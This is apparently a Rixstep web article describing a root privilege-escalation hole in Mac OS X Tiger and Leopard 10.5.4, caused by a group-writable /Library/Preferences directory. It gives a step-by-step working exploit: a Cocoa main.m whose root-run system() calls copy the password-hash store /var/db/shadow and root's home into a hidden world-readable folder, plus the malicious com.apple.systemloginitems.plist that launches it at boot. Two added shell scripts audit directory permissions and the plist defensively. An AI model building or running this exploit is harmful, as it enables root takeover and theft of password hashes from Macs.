Rixstep

Get Root on 10.5.4

There's a wide open door on 'ten-five-four'.



It's possible to 'root' Apple's latest update of their operating system OS X 'Leopard' without hacking or in any way making an effort. Both Tiger and Leopard have a wide open door: another design flaw.

/Library/Preferences

Apple like to put sensitive system data in the widely accessible directory /Library. This has resulted in security catastrophes in the past but Apple have not changed their policy.

Today's infinite bloop concerns the path /Library/Preferences. On both Tiger and Leopard it's marked root:admin 0775: owned by root, but with the group write bit set for admin, which means every member of the admin group can create, rename and remove entries in it.

Many of the files at this path are marked root:admin 0644 but that doesn't matter: removing, renaming or replacing a file is governed by the permissions on the directory, not on the file, and nothing stops a new file from being created there either. There's no sticky bit on the directory, so even files an admin user never created are fair game.
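A quick way to test the claim on a given box, as an added example that is not part of this page or of any Rixstep product: the check below decides from the permission line 'ls -ld' prints whether the invoking account can write a directory. The parsing is kept pure so it can be exercised with constructed input; audit_dir() wires it to the live system. The function names, the reliance on the 'ls -ld' column layout and on 'id -Gn' for the group list are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not Rixstep's code: can USER create or remove entries in
# the directory described by an 'ls -ld' line?  The permission string is
# read from column 1, the owner from column 3 and the group from column 4.

# can_write_dir LS_LINE USER "GROUP1 GROUP2 ..."
# Prints the reason and returns 0 when USER can write the directory,
# 1 when not, 2 when the line does not describe a directory at all.
can_write_dir() {
    line=$1; user=$2; groups=$3
    set -- $line                   # split the ls -ld line on whitespace
    perms=$1; owner=$3; group=$4
    case $perms in
        d*) ;;
        *) echo "not a directory: $perms"; return 2 ;;
    esac
    # characters 3, 6 and 9 of the permission string are the write bits
    ow=$(printf '%s' "$perms" | cut -c3)
    gw=$(printf '%s' "$perms" | cut -c6)
    xw=$(printf '%s' "$perms" | cut -c9)
    if [ "$user" = root ]; then
        echo "root: always writable"; return 0
    fi
    if [ "$owner" = "$user" ] && [ "$ow" = w ]; then
        echo "writable as owner $owner (mode $perms)"; return 0
    fi
    for g in $groups; do
        if [ "$g" = "$group" ] && [ "$gw" = w ]; then
            echo "writable via group $group (mode $perms)"; return 0
        fi
    done
    if [ "$xw" = w ]; then
        echo "writable by everyone (mode $perms)"; return 0
    fi
    echo "not writable by $user (mode $perms)"; return 1
}

# audit_dir PATH: run the check for the invoking account on a real directory.
audit_dir() {
    can_write_dir "$(ls -ld "$1")" "$(id -un)" "$(id -Gn)"
}
```

Run 'audit_dir /Library/Preferences' from the first account on a Tiger or Leopard install and it reports the directory writable via group admin. Taking the group write bit away (0755) closes this particular door; before doing that on a production box, confirm that nothing you rely on writes to /Library/Preferences as a non-root admin user rather than through an authorised helper.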

com.apple.systemloginitems.plist

Apple used to have this problem: startup items. Anyone could place a package at the appropriate path in /Library, then wait for a reboot, then own the entire machine. No hacking required.

This security hole turned up about the time Jaguar was released; in early 2003 a script was developed to highlight the hole as Apple staunchly refused to do anything about it; in October 2003 the script became known as 'Opener' and caused quite a stir.

Between October 2003 - the release of Panther - and April 2005 Apple did nothing. That more people weren't hacked was pure luck.

Tiger addressed the startup items hole on 29 April 2005 - but at the same time introduced another hole, an arguably bigger hole, that exists in OS X to this day.

The following proof-of-concept exploit has been tested on both Tiger 10.4 and a fully updated Leopard 10.5.4 and it works like a charm.

Any account in the admin group - and that's the first account created on every Mac - can root Apple's fully updated operating system without so much as a password prompt. So can anything that happens to be running as that account.

How You Root 10.5.4

Rooting Apple's OS X 10.5.4 is actually rather simple.

1. Install the ADC tools. You're going to build a Cocoa application but don't worry: you won't have to code anything.

2. Start a new Cocoa application project. Name it what you want. Such as 'SLIHack'.

3. Go into your NIB file. This is 'MainMenu.nib'.

4. Create a class. Under NSObject. Name it what you want. Such as 'SLIHack'.

5. Create files for and instantiate your new class.

6. Remove both the menu and the window from the NIB. Then save the NIB and close IB.

7. Edit a file. The file is main.m. You want it to look like this.

#import <Cocoa/Cocoa.h>   /* NSApplicationMain() */
#include <stdlib.h>       /* system() */

/* Launched by the system at boot, before anyone has logged in, so every
   system() call below runs as root. */
int main(int argc, const char *argv[]) {
    system("/sbin/mount -uw /");                    /* make sure / is writable */
    system("/bin/mkdir /Users/Shared/.SLIHack");
    /* copy two trees only root may read: the password hashes and root's home */
    system("cp -R /private/var/db/shadow /Users/Shared/.SLIHack");
    system("cp -R /private/var/root /Users/Shared/.SLIHack");
    /* hand the copies to an unprivileged owner and open them to everyone */
    system("chown -R nobody:staff /Users/Shared/.SLIHack");
    system("chmod -R 0777 /Users/Shared/.SLIHack");
    return NSApplicationMain(argc, argv);
}

8. Build the app. You'll now have an application bundle, SLIHack.app, under the path 'build' in your project directory.

9. Move the Cocoa bundle. To '/Users/Shared'.

10. Copy the following to a plain text file. Save it as '/Library/Preferences/com.apple.systemloginitems.plist'.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>AutoLaunchedApplicationDictionary</key>
    <array>
        <dict>
            <key>Hide</key>
            <true/>
            <key>Path</key>
            <string>/Users/Shared/SLIHack.app</string>
        </dict>
    </array>
</dict>
</plist>

All you do now is reboot. Once you've logged in you'll find the telltale files at '/Users/Shared/.SLIHack': copies of /var/db/shadow and of root's home directory, both of which only root can read on an untouched system. Whatever wrote them ran as root, and nothing asked you for a password along the way.
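To see what such a plist would launch without waiting for a reboot, here is an added example (mine, not Rixstep's): it walks an AutoLaunchedApplicationDictionary plist laid out as above with awk alone, so it needs no plutil, and reports every launched path outside /System for review. The function names, the choice of /System as the only trusted prefix, and the assumption of one key or string element per line or per pair are this example's own.

```shell
#!/bin/sh
# Added example, not Rixstep's code: list what a loginwindow-style
# AutoLaunchedApplicationDictionary plist would launch, and flag entries
# that do not live under /System.  Only the <key>Path</key>/<string>
# pairs matter; everything else in the file is ignored.

# launched_paths FILE: print one launched path per line.
launched_paths() {
    awk '
        /<key>Path<\/key>/ { want = 1; sub(/.*<key>Path<\/key>/, "") }
        want && /<string>/ {
            sub(/^.*<string>/, ""); sub(/<\/string>.*$/, "")
            print; want = 0
        }
    ' "$1"
}

# flag_suspicious FILE: print "SUSPECT <path>" for every launched path
# outside /System; return 1 if any were found, 0 otherwise.
flag_suspicious() {
    suspects=$(launched_paths "$1" | grep -v '^/System/' || true)
    if [ -z "$suspects" ]; then
        return 0
    fi
    printf '%s\n' "$suspects" | sed 's/^/SUSPECT /'
    return 1
}

# audit_system_login_items: check the file this page is about on a live box.
audit_system_login_items() {
    f=/Library/Preferences/com.apple.systemloginitems.plist
    if [ ! -e "$f" ]; then
        echo "no $f: nothing is auto-launched from here"
        return 0
    fi
    ls -l "$f"              # owner and mode tell you who could have put it there
    flag_suspicious "$f"
}
```

Fed the plist from step 10, launched_paths prints /Users/Shared/SLIHack.app and flag_suspicious marks it SUSPECT; an entry under /System/Library passes. Anything the check flags deserves the same scrutiny as an unexpected startup item did in the Opener days: find out who wrote the file, and what the bundle it points at does.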

See Also
Learning Curve: Rooting 10.5.4

Copyright © Rixstep. All rights reserved.